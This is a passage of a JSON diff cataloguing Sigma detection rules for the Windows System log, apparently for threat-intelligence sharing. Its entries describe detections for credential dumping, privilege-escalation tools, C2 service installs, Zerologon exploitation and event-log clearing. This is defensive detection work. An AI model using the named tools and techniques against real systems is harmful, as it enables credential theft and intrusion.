"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_kdcsvc_rc4_downgrade.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/11/09", + "filename": "win_system_kdcsvc_rc4_downgrade.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects service creation from KrbRelayUp tool used for privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)", + "uuid": "e97d9903-53b2-41fc-8cb9-889ed4093e80", + "value": "KrbRelayUp Service Installation", + "meta": { + "refs": [ + "https://github.com/Dec0ne/KrbRelayUp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_krbrelayup_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ], + "creation_date": "2022/05/11", + "filename": "win_system_krbrelayup_service_installation.yml", + "author": "Sittikorn S, Tim Shelton", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "uuid": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "value": "Local Privilege Escalation Indicator TabTip", + "meta": { + "refs": [ + "https://github.com/antonioCoco/JuicyPotatoNG", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lpe_indicators_tabtip.yml" + ], + "tags": [ + "attack.execution", + "attack.t1557.001" + ], + "creation_date": "2022/10/07", + "filename": "win_system_lpe_indicators_tabtip.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the reporting of NTLMv1 being used between a client and server", + "uuid": "e9d4ab66-a532-4ef7-a502-66a9e4a34f5d", + "value": "NTLMv1 Logon Between Client and Server", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1550/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_lsasrv_ntlmv1.yml" + ], + "tags": [ + "attack.execution", + "attack.t1550.002", + "attack.s0363" + ], + "creation_date": "2022/04/26", + "filename": "win_system_lsasrv_ntlmv1.yml", + "author": "Tim Shelton", + "level": "low", + "falsepositive": [ + "Environments that use NTLMv1" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects well-known credential dumping tools execution via service execution events", + "uuid": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", + "value": "Credential Dumping Tools Service Execution - System", + "meta": { + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_mal_creddumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.execution", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006", + "attack.t1569.002", + "attack.s0005" + ], + "creation_date": "2017/03/05", + "filename": "win_system_mal_creddumper.yml", + "author": "Florian Roth, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate Administrator using credential dumping tool for password recovery" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "uuid": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" + ], + "creation_date": "2019/10/26", + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "level": "critical", + "falsepositive": [ + "Highly unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "uuid": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "value": "Moriya Rootkit - System", + "meta": { + "refs": [ + "https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_moriya_rootkit.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2021/05/06", + "filename": "win_system_moriya_rootkit.yml", + "author": "Bhabesh Raj", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "uuid": "f14719ce-d3ab-4e25-9ce6-2899092260b0", + "value": "NTFS Vulnerability Exploitation", + "meta": { + "refs": [ + "https://twitter.com/jonasLyk/status/1347900440000811010", + "https://twitter.com/wdormann/status/1347958161609809921", + "https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_ntfs_vuln_exploit.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.001" + ], + "creation_date": "2021/01/11", + "filename": "win_system_ntfs_vuln_exploit.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", + "uuid": "7b687634-ab20-11ea-bb37-0242ac130002", + "value": "Windows Pcap Drivers", + "meta": { + "refs": [ + "https://ragged-lab.blogspot.com/2020/06/capturing-pcap-driver-installations.html#more", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_pcap_drivers.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ], + "creation_date": "2020/06/10", + "filename": "win_system_pcap_drivers.yml", + "author": "Cian Heasley", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "uuid": "18f37338-b9bd-4117-a039-280c81f7a596", + "value": "Zerologon Exploitation Using Well-known Tools", + "meta": { + "refs": [ + "https://www.secura.com/blog/zero-logon", + "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + ], + "tags": [ + "attack.t1210", + "attack.lateral_movement" + ], + "creation_date": "2020/10/13", + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", + "level": "critical", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects powershell script installed as a Service", + "uuid": "a2e5019d-a658-4c6a-92bf-7197b54e2cae", + "value": "PowerShell Scripts Installed as Services", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_powershell_script_installed_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2020/10/06", + "filename": "win_system_powershell_script_installed_as_service.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects QuarksPwDump clearing access history in hive", + "uuid": "39f919f3-980b-4e6f-a975-8af7e507ef2b", + "value": "QuarksPwDump Clearing Access History", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_quarkspwdump_clearing_hive_access_history.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2017/05/15", + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml", + "author": "Florian Roth", + "level": "critical", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services", + "uuid": "66bfef30-22a5-4fcd-ad44-8d81e60922ae", + "value": "Rare Service Installations", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rare_service_installs.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ], + "creation_date": "2017/03/08", + "filename": "win_system_rare_service_installs.yml", + "author": "Florian Roth", + "level": "low", + "falsepositive": [ + "Software installation", + "Software updates" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", + "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885", + "value": "Potential RDP Exploit CVE-2019-0708", + "meta": { + "refs": [ + "https://github.com/zerosum0x0/CVE-2019-0708", + "https://github.com/Ekultek/BlueKeep", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" + ], + "creation_date": "2019/05/24", + "filename": "win_system_rdp_potential_cve_2019_0708.yml", + "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "level": "medium", + "falsepositive": [ + "Bad connections or network interruptions" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.", + "uuid": "530a6faa-ff3d-4022-b315-50828e77eef5", + "value": "Anydesk Remote Access Software Service Installation", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_anydesk.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/11", + "filename": "win_system_service_install_anydesk.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate usage of the anydesk tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "uuid": "d26ce60c-2151-403c-9a42-49420d87b5e4", + "value": "Hacktool Service Registration or Execution", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_hacktools.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2022/03/21", + "filename": "win_system_service_install_hacktools.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers", + "uuid": "e0d1ad53-c7eb-48ec-a87a-72393cc6cedc", + "value": "Mesh Agent Service Installation", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_mesh_agent.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/11/28", + "filename": "win_system_service_install_mesh_agent.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects NetSupport Manager service installation on the target system.", + "uuid": "2d510d8d-912b-45c5-b1df-36faa3d8c3f4", + "value": "NetSupport Manager Service Install", + "meta": { + "refs": [ + "http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_netsupport_manager.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/10/31", + "filename": "win_system_service_install_netsupport_manager.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects PAExec service installation", + "uuid": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", + "value": "PAExec Service Installation", + "meta": { + "refs": [ + "https://www.poweradmin.com/paexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_paexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2022/10/26", + "filename": "win_system_service_install_paexec.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", + "uuid": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", + "value": "New PDQDeploy Service - Server Side", + "meta": { + "refs": [ + "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/22", + "filename": "win_system_service_install_pdqdeploy.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "uuid": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "value": "New PDQDeploy Service - Client Side", + "meta": { + "refs": [ + "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_pdqdeploy_runner.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/07/22", + "filename": "win_system_service_install_pdqdeploy_runner.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28", + "value": "PsExec Service Installation", + "meta": { + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_psexec.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ], + "creation_date": "2017/06/12", + "filename": "win_system_service_install_psexec.yml", + "author": "Thomas Patzke", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects Remote Utilities Host service installation on the target system.", + "uuid": "85cce894-dd8b-4427-a958-5cc47a4dc9b9", + "value": "Remote Utilities Host Service Install", + "meta": { + "refs": [ + "https://www.remoteutilities.com/support/kb/host-service-won-t-start/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_remote_utilities.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/10/31", + "filename": "win_system_service_install_remote_utilities.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", + "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "value": "Sliver C2 Default Service Installation", + "meta": { + "refs": [ + "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_sliver.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" + ], + "creation_date": "2022/08/25", + "filename": "win_system_service_install_sliver.yml", + "author": "Florian Roth, Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "uuid": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "value": "New Service Uses Double Ampersand in Path", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_susp_double_ampersand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ], + "creation_date": "2022/07/05", + "filename": "win_system_service_install_susp_double_ampersand.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.", + "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", + "value": "TacticalRMM Service Installation", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_service_install_tacticalrmm.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1219" + ], + "creation_date": "2022/11/28", + "filename": "win_system_service_install_tacticalrmm.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate use of the tool" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "uuid": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "value": "DHCP Server Loaded the CallOut DLL", + "meta": { + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2017/05/15", + "filename": "win_system_susp_dhcp_config.yml", + "author": "Dimitrios Slamaris", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "uuid": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "value": "DHCP Server Error Failed Loading the CallOut DLL", + "meta": { + "refs": [ + "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", + "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", + "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ], + "creation_date": "2017/05/15", + "filename": "win_system_susp_dhcp_config_failed.yml", + "author": "Dimitrios Slamaris, @atc_project (fix)", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "One of the Windows Core Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", + "value": "System Eventlog Cleared", + "meta": { + "refs": [ + "https://twitter.com/deviouspolack/status/832535435960209408", + "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" + ], + "creation_date": "2022/05/17", + "filename": "win_system_susp_eventlog_cleared.yml", + "author": "Florian Roth, Tim Shelton", + "level": "high", + "falsepositive": [ + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "uuid": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "value": "ProcessHacker Privilege Elevation", + "meta": { + "refs": [ + "https://twitter.com/1kwpeter/status/1397816101455765504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_proceshacker.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1543.003", + "attack.t1569.002" + ], + "creation_date": "2021/05/27", + "filename": "win_system_susp_proceshacker.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse", + "uuid": "91c49341-e2ef-40c0-ac45-49ec5c3fe26c", + "value": "RTCore Suspicious Service Installation", + "meta": { + "refs": [ + "https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_rtcore64_service_install.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/30", + "filename": "win_system_susp_rtcore64_service_install.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious SAM dump activity as cause by QuarksPwDump and other password dumpers", + "uuid": "839dd1e8-eda8-4834-8145-01beeee33acd", + "value": "SAM Dump to AppData", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_sam_dump.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2018/01/27", + "filename": "win_system_susp_sam_dump.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious service installation commands", + "uuid": "1d61f71d-59d2-479e-9562-4ff5f4ead16b", + "value": "Suspicious Service Installation", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ], + "creation_date": "2022/03/18", + "filename": "win_system_susp_service_installation.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects service installation in suspicious folder appdata", + "uuid": "5e993621-67d4-488a-b9ae-b420d08b96cb", + "value": "Service Installation in Suspicious Folder", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ], + "creation_date": "2022/03/18", + "filename": "win_system_susp_service_installation_folder.yml", + "author": "pH-T", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects service installation with suspicious folder patterns", + "uuid": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "value": "Service Installation with Suspicious Folder Pattern", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_folder_pattern.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ], + "creation_date": "2022/03/18", + "filename": "win_system_susp_service_installation_folder_pattern.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects suspicious service installation scripts", + "uuid": "70f00d10-60b2-4f34-b9a0-dc3df3fe762a", + "value": "Suspicious Service Installation Script", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_service_installation_script.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" + ], + "creation_date": "2022/03/18", + "filename": "win_system_susp_service_installation_script.yml", + "author": "pH-T", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Windows Update get some error Check if need a 0-days KB", + "uuid": "13cfeb75-9e33-4d04-b0f7-ab8faaa95a59", + "value": "Windows Update Error", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_system_update_error.yml" + ], + "tags": [ + "attack.impact", + "attack.resource_development", + "attack.t1584" + ], + "creation_date": "2021/12/04", + "filename": "win_system_susp_system_update_error.yml", + "author": "frack113", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "During exploitation of this vuln, two logs (providername:Microsoft-Windows-User Profiles Service) with eventid 1511 and 1515 (maybe lot of false positives with this event) are created. Moreover, it appears the directory \\Users\\TEMP is created may be created during the exploitation.Viewed on 2008 Server", + "uuid": "52a85084-6989-40c3-8f32-091e12e17692", + "value": "Suspicious Usage of CVE_2021_34484 or CVE 2022_21919", + "meta": { + "refs": [ + "https://packetstormsecurity.com/files/166692/Windows-User-Profile-Service-Privlege-Escalation.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml" + ], + "tags": [ + "attack.execution" + ], + "creation_date": "2022/08/16", + "filename": "win_system_susp_vuln_cve_2022_21919_or_cve_2021_34484.yml", + "author": "Cybex", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "uuid": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "value": "Service Installed By Unusual Client - System", + "meta": { + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_system_service_installation_by_unusal_client.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1543" + ], + "creation_date": "2022/09/15", + "filename": "win_system_system_service_installation_by_unusal_client.yml", + "author": "Tim Rauch", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "system", + "logsource.product": "windows" + } + }, + { + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques", + "uuid": "8e4cf0e5-aa5d-4dc3-beff-dc26917744a9", + "value": "Tap Driver Installation", + "meta": { + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_tap_driver_installation.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ], + "creation_date": "2019/10/24", + "filename": "win_system_tap_driver_installation.yml", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate OpenVPN TAP insntallation" + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects volume shadow copy mount via windows event log", + "uuid": "f512acbf-e662-4903-843e-97ce4652b740", + "value": "Volume Shadow Copy Mount", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_volume_shadow_copy_mount.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ], + "creation_date": "2020/10/20", + "filename": "win_system_volume_shadow_copy_mount.yml", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "level": "low", + "falsepositive": [ + "Legitimate use of volume shadow copy mounts (backups maybe)." + ], + "logsource.category": "No established category", + "logsource.product": "windows" + } + }, + { + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "uuid": "a0cb7110-edf0-47a4-9177-541a4083128a", + "value": "Vulnerable Netlogon Secure Channel 